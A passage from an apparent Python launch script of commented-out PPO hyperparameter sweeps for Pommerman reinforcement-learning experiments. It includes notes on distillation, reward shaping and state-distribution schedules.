# "num-processes": 30, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8, "distill-expert": "SimpleAgent"
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995, .999]:
# for distill in [2500, 5000]:
# j = {k:v for k,v in job.items()}
# run_name = "pmanhomdst8x8"
# j["run-name"] = run_name + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# j["distill-epochs"] = distill
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are being run with a very small dataset of just 4 things.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFAEasy-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition4-s100/train")
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995]:
# for distill in [0, 3000]:
# for (name, distro) in [("uSchA", "uniformScheduleA"),
# ("uAdpt", "uniformAdapt"),
# ("uBnA", "uniformBoundsA"),
# ("uBnB", "uniformBoundsB")]:
# for num_processes in [50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman4%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are redos for the new dataset.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition11k-s10000/train")
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995]:
# for distill in [0, 3000]:
# for (name, distro) in [("uSchA", "uniformScheduleA"),
# ("uAdpt", "uniformAdapt"),
# ("uBnA", "uniformBoundsA"),
# ("uBnB", "uniformBoundsB")]:
# for num_processes in [50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman11kTr-%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Homog with reward shaping.
# These allll sucked.
# job = {
# "num-processes": 50, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995, 1.]:
# for distill in [0, 3000]:
# for bomb_reward in [0.0, 0.001, 0.01]:
# for step_loss in [0.0, -0.001, -0.01]:
# for begin_selfbombing_epoch in [0, 100, 500]:
# if bomb_reward == 0 and step_loss == 0 and begin_selfbombing_epoch == 0:
# continue
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pmhom8x8"
# if begin_selfbombing_epoch > 0:
# j["run-name"] += "-bsbe%d" % begin_selfbombing_epoch
# j["begin-selfbombing-epoch"] = begin_selfbombing_epoch
# if bomb_reward:
# j["run-name"] += "-br%d" % int(1000*bomb_reward)
# j["bomb-reward"] = bomb_reward
# if step_loss:
# j["run-name"] += "-st%d" % int(-1000*step_loss)
# j["step-loss"] = step_loss
# if distill:
# j["distill-expert"] = "SimpleAgent"
# j["distill-epochs"] = distill
# j["run-name"] = j["run-name"] + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# What happens if we do homogenous with a large begin_selfbombing_epoch?
# job = {
# "num-processes": 50, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995, 1.]:
# for distill in [0, 3000]:
# for begin_selfbombing_epoch in [10000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pmhom8x8"
# j["run-name"] += "-bsbe%d" % begin_selfbombing_epoch
# j["begin-selfbombing-epoch"] = begin_selfbombing_epoch
# if distill:
# j["distill-expert"] = "SimpleAgent"
# j["distill-epochs"] = distill
# j["run-name"] = j["run-name"] + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# ### These are being run with a very small dataset of just 4 things.
# # Testing what happens if we use a large begin_selfbombing_epoch.
# # They had the same effect as before, namely that nothing interesting happened
# # after the selfbombing was allowed again.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0",
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition4-s100/train"),
# "num-processes": 50,
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995, 1]:
# for distill in [0, 3000]:
# for (name, distro) in [
# ("uAdpt", "uniformAdapt"),
# ("uSchA", "uniformScheduleB"),
# ]:
# for begin_selfbombing_epoch in [6000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman4%s-lgbsbe%d-%d" % (
# name, begin_selfbombing_epoch, counter)
# j["begin-selfbombing-epoch"] = begin_selfbombing_epoch
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are doing 8x8 simple ffa with the begin_selfbombing_epoch.
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# # "eval-mode": "ffa-curriculum"
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995, 1.]:
# for distill in [0, 3000]:
# for begin_selfbombing_epoch in [1000, 10000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman8x8nsk-lgbsbe%d-%d" % (
# begin_selfbombing_epoch, counter)
# j["begin-selfbombing-epoch"] = begin_selfbombing_epoch
# if distill:
# j["run-name"] += "-dst"
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Homog but this time against the simple agent as the starting challenger.
# TODO: THESE DIDN'T START ... Why not??
# job = {
# "num-processes": 30, "how-train": "homogenous", "eval-mode": "homogenous",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeTeam8x8-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall",
# "use-gae": "", "board-size": 8,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995, .999]:
# for distill in [0, 2500, 5000]:
# run_name = "pmanhom8smpst"
# j = {k:v for k,v in job.items()}
# if distill:
# j["distill-expert"] = "SimpleAgent"
# j["distill-epochs"] = distill
# run_name += "dst"
# j["run-name"] = run_name + "-%d" % counter
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# TODO
### These are attempting to do reward shaping. We are using the small dataset
### because then we'll get results faster.
### These didn't work. They achieved full success, but that wasn't sufficient
### to get the agents to learn another approach other than "don't bomb."
#### NOTE: none of these runs used step loss or bomb reward.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "num-battles-eval": 100,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition4-s100/train"),
# "num-processes": 50,
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995]:
# for distill in [0, 3000]:
# for (name, distro) in [
# ("uAdpt", "uniformAdapt"),
# ("uBnA", "uniformBoundsA")
# ]:
# for bomb_reward in [0.0, 0.05, 0.1]:
# for step_loss in [0.0, -0.05, -0.1]:
# if bomb_reward == 0.0 and step_loss == 0.0:
# continue
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman4"
# if bomb_reward:
# j["run-name"] += "br%d" % int(100*bomb_reward)
# if step_loss:
# j["run-name"] += "st%d" % int(100*step_loss)
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["run-name"] += "-dst"
# j["state-directory-distribution"] = distro
# j["run-name"] += "-%s-%d" % (name, counter)
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# # These are the same as above but with 8x8.
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# # "eval-mode": "ffa-curriculum"
# }
# counter = 0
# for learning_rate in [1e-4]:
# for gamma in [.995]:
# for distill in [0, 3000]:
# for bomb_reward in [0.0, 0.05, 0.1]:
# for step_loss in [0.0, -0.05, -0.1]:
# if bomb_reward == 0.0 and step_loss == 0.0:
# continue
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman8x8"
# if bomb_reward:
# j["run-name"] += "br%d" % int(100*bomb_reward)
# if step_loss:
# j["run-name"] += "st%d" % int(100*step_loss)
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "SimpleAgent"
# j["run-name"] += "-dst"
# j["run-name"] += "-%s-%d" % (name, counter)
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These repeat the 8x8 test but with complex agents, because complex agents
### don't kill themselves.
# job = {
# "num-processes": 25, "how-train": "simple",
# "log-interval": 1000, "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFA8x8-v0", "board-size": 8,
# "model-str": "PommeCNNPolicySmall", "use-gae": "",
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.99, .995, 1.]:
# for distill in [0, 2500, 5000]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pmancmplx8x8-%d" % counter
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "ComplexAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are being run with a very small dataset of just 4 things and with ComplexAgent.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "state-directory": os.path.join(directory, "ffacompetition4-s100-complex/train")
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for gamma in [.995, 1.]:
# for distill in [0, 2500, 5000]:
# for (name, distro) in [("uSchA", "uniformScheduleA"),
# ("uAdpt", "uniformAdapt"),
# ("uBnA", "uniformBoundsA")]:
# for num_processes in [50]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "pman4cmplx%s-%d" % (name, counter)
# j["num-processes"] = num_processes
# j["state-directory-distribution"] = distro
# if distill:
# j["distill-epochs"] = distill
# j["distill-expert"] = "ComplexAgent"
# j["gamma"] = gamma
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These mostly worked; however, they didn't end up going as far back in time
### as we wanted because they hit some odd bugs.
### A note is that while the reduced schedules did not seem to work for 100, they did
### seem to work for 4.
# job = {
# "how-train": "simple", "log-interval": 1000,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# ("uSchB", "uniformScheduleB"),
# ("uSchC", "uniformScheduleC"),
# ("uSchD", "uniformScheduleD"),
# ("uSchE", "uniformScheduleE"),
# ("uSchF", "uniformScheduleF"),
# ("uSchG", "uniformScheduleG"),
# ("uBnD", "uniformBoundsD"),
# ("uBnE", "uniformBoundsE"),
# ("uBnA", "uniformBoundsA")
# ]:
# for numgames in [100, 4]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "pman%dcmplx2%s-%d" % (numgames, name, counter)
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Similar to the above, but for 4. To be honest, this is basically the key experiment right here.
### We are asking: Can we learn better from the back than from the front?
# These are still going. They are doing well but we want to go faster and hone in on the backend.
# saved_paths = {
# "cmplxagn-4-uBnB-4": "agent0-cmplxagn-4-uBnB-4.simple.FFACompetition-v0.Small.nc256.lr0.0001.bs5120.ns103.gam1.0.seed1.gae.uniformBoundsBepoch4750.steps24462500.pt",
# "cmplxagn-4-uBnB-15": "agent0-cmplxagn-4-uBnB-15.simple.FFACompetition-v0.Small.nc256.lr6e-05.bs5120.ns103.gam1.0.seed1.gae.uniformBoundsBepoch4500.steps23175000.pt",
# }
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# ("uSchC", "uniformScheduleC"), #500
# ("uSchB", "uniformScheduleB"), #1000
# ("uSchF", "uniformScheduleF"), #2000
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ("uBnE", "uniformBoundsE"), #2000
# ("genesis", "genesis"),
# ("uFwdA", "uniformForwardA"), #250
# ("uFwdB", "uniformForwardB"), #500
# ("uFwdC", "uniformForwardC"), #1000
# ("uAll", "uniform"), #all random.
# # ("ubtst", "uniformBoundsBTst"),
# ]:
# for numgames in [4]:
# if counter not in [4, 15]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxagn-%d-%s-%d" % (numgames, name, counter)
# path = saved_paths.get(j["run-name"])
# if not path:
# counter += 1
# continue
# else:
# j["saved-paths"] = "/checkpoint/cinjon/selfplayground/models/%s" % path
# print("DOING SAVED PATH: ", j["saved-paths"])
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### LSTM runs with distribution: 16
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "gamma": "1.0", "use-gae": "",
# "model-str": "PommeCNNPolicySmall",
# "recurrent-policy": "", "eval-mode": "ffa", "num-stack": 1,
# "config": "PommeFFACompetition-v0"
# }
# counter = 0
# for learning_rate in [1e-4, 3e-5]:
# for (name, distro) in [
# ("exdistr", None),
# ("genesis", "genesis"), # always starts at step 0 from replays.
# ("uSchC", "uniformScheduleC"), #500
# ("uSchB", "uniformScheduleB"), #1000
# ("uSchF", "uniformScheduleF"), #2000
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ("uBnE", "uniformBoundsE"), #2000
# ]:
# if distro:
# j["state-directory"] = os.path.join(directory, "ffacompetition4-s100-complex/train")
# j["state-directory-distribution"] = distro
# j = {k:v for k,v in job.items()}
# j["run-name"] = "lstm-%s-pman%d" % (name, counter)
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# ### LSTM with 8x8: 2
# job = {
# "num-processes": 50, "how-train": "simple",
# "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"),
# "save-dir": os.path.join(directory, "models"),
# "gamma": "1.0", "use-gae": "",
# "model-str": "PommeCNNPolicySmall",
# "recurrent-policy": "", "eval-mode": "ffa", "num-stack": 1,
# "config": "PommeFFA8x8-v0", "board-size": 8,
# }
# counter = 0
# for learning_rate in [1e-4, 3e-5]:
# j = {k:v for k,v in job.items()}
# j["run-name"] = "lstm8x8-pman%d" % (counter)
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Doing the above (non-lstm jobs) but having honed in on the backend more.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# ("setBnA", "setBoundsA"),
# ("setBnB", "setBoundsB"),
# ]:
# for numgames in [4]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxfstr-%d-%s-%d" % (numgames, name, counter)
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# saved_paths = {
# "cmplxfstr-4-setBnC-4": "agent0-cmplxfstr-4-setBnC-4.simple.FFACompetition-v0.Small.nc256.lr3e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsCepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnC-2": "agent0-cmplxfstr-4-setBnC-2.simple.FFACompetition-v0.Small.nc256.lr6e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsCepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnD-1": "agent0-cmplxfstr-4-setBnD-1.simple.FFACompetition-v0.Small.nc256.lr0.0001.bs5120.ns103.gam1.0.seed1.gae.setBoundsDepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnF-3": "agent0-cmplxfstr-4-setBnF-3.simple.FFACompetition-v0.Small.nc256.lr6e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsFepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnE-4": "agent0-cmplxfstr-4-setBnE-4.simple.FFACompetition-v0.Small.nc256.lr3e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsEepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnD-5": "agent0-cmplxfstr-4-setBnD-5.simple.FFACompetition-v0.Small.nc256.lr3e-05.bs5120.ns103.gam1.0.seed1.gae.setBoundsDepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnE-0": "agent0-cmplxfstr-4-setBnE-0.simple.FFACompetition-v0.Small.nc256.lr0.0001.bs5120.ns103.gam1.0.seed1.gae.setBoundsEepoch1250.steps6437500.pt",
# "cmplxfstr-4-setBnF-1": "agent0-cmplxfstr-4-setBnF-1.simple.FFACompetition-v0.Small.nc256.lr0.0001.bs5120.ns103.gam1.0.seed1.gae.setBoundsFepoch1250.steps6437500.pt",
# }
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# ("setBnC", "setBoundsC"),
# ("setBnD", "setBoundsD"),
# ]:
# for numgames in [4]:
# if counter not in [1, 2, 4, 5]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxfstr-%d-%s-%d" % (numgames, name, counter)
# path = saved_paths.get(j["run-name"])
# if not path:
# counter += 1
# continue
# else:
# j["saved-paths"] = "/checkpoint/cinjon/selfplayground/models/%s" % path
# print("DOING SAVED PATH: ", j["saved-paths"])
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5, 3e-5]:
# for (name, distro) in [
# # ("setBnC", "setBoundsC"),
# # ("setBnD", "setBoundsD"),
# ("setBnE", "setBoundsE"),
# ("setBnF", "setBoundsF"),
# ]:
# for numgames in [4]:
# if counter not in [0, 1, 3, 4]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxfstr-%d-%s-%d" % (numgames, name, counter)
# path = saved_paths.get(j["run-name"])
# if not path:
# counter += 1
# continue
# else:
# j["saved-paths"] = "/checkpoint/cinjon/selfplayground/models/%s" % path
# print("DOING SAVED PATH: ", j["saved-paths"])
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Test adding an item reward in.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ]:
# for numgames in [4, 100]:
# for itemreward in [0, .03, .1]:
# if itemreward == 0 and numgames == 4:
# continue
# if counter not in [0, 36, 30, 10, 25]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxitm%d-%s-%d" % (numgames, name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Same as above, but including some other runs.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ]:
# for numgames in [4]:
# for itemreward in [.01, 0]:
# if counter not in [4, 14, 5, 12, 8, 1, 3, 0, 2]:
# counter += 1
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "cmplxitm2-%d-%s-%d" % (numgames, name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### Uninterrupted version of the above :/.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 250,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ]:
# for numgames in [4]:
# for itemreward in [0, .01, .03, .1]:
# for seed in [2, 3]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "unint-cmplxitm%d-%s-%d" % (numgames, name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### With the dumb batch size fix.
# NOTE: This is the SMALL BATCH SIZE / WARM START VERSION!!!
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 500,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 50, "gamma": 1.0,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ]:
# for numgames in [4]:
# for itemreward in [0, .03, .1]:
# for seed in [2]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "untbsfx-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These were promising but take a very long time to run, so we want to expedite them and save them more frequently.
### NOTE: THIS IS THE BIG BATCH SIZE / WARM START
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [1e-4, 6e-5]:
# for (name, distro) in [
# ("setBnF", "setBoundsF"),
# ("setBnD", "setBoundsD"),
# ("uBnF", "uniformBoundsF"), #500
# ("uBnB", "uniformBoundsB"), #1000
# ("genesis", "genesis"),
# ]:
# for numgames in [4]:
# for itemreward in [0, .1]:
# for seed in [1]:
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "bsfx-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### This is the main comparison between genesis and uBn.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-bsfx"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4, 1e-4]:
# for (name, distro) in [
# ("uBnG", "uniformBoundsG"), #50
# ("uBnH", "uniformBoundsH"), #100
# ("genesis", "genesis"),
# ]:
# for numgames in [4]:
# for itemreward in [0, .03, .1]:
# for seed in [1]:
# if itemreward == 0 and name == "genesis":
# continue
# j = {k:v for k,v in job.items()}
# j["state-directory"] = os.path.join(directory, "ffacompetition%d-s100-complex/train" % numgames)
# j["run-name"] = "bsfx-%s-%d" % (name, counter)
# if itemreward:
# j["item-reward"] = itemreward
# j["seed"] = seed
# j["state-directory-distribution"] = distro
# j["lr"] = learning_rate
# train_ppo_job(j, j["run-name"], is_fb=True)
# counter += 1
### These are doing the above but for 100 games. Consequently, we had to apply longer bounds.
# job = {
# "how-train": "simple", "log-interval": 2500, "save-interval": 25,
# "log-dir": os.path.join(directory, "logs-bsfx100"), "save-dir": os.path.join(directory, "models"),
# "config": "PommeFFACompetition-v0", "model-str": "PommeCNNPolicySmall", "use-gae": "",
# "num-processes": 60, "gamma": 1.0, "batch-size": 102400, "num-mini-batch": 20,
# "num-frames": 2000000000,
# }
# counter = 0
# for learning_rate in [3e-4]:
# for (name, distro) in [
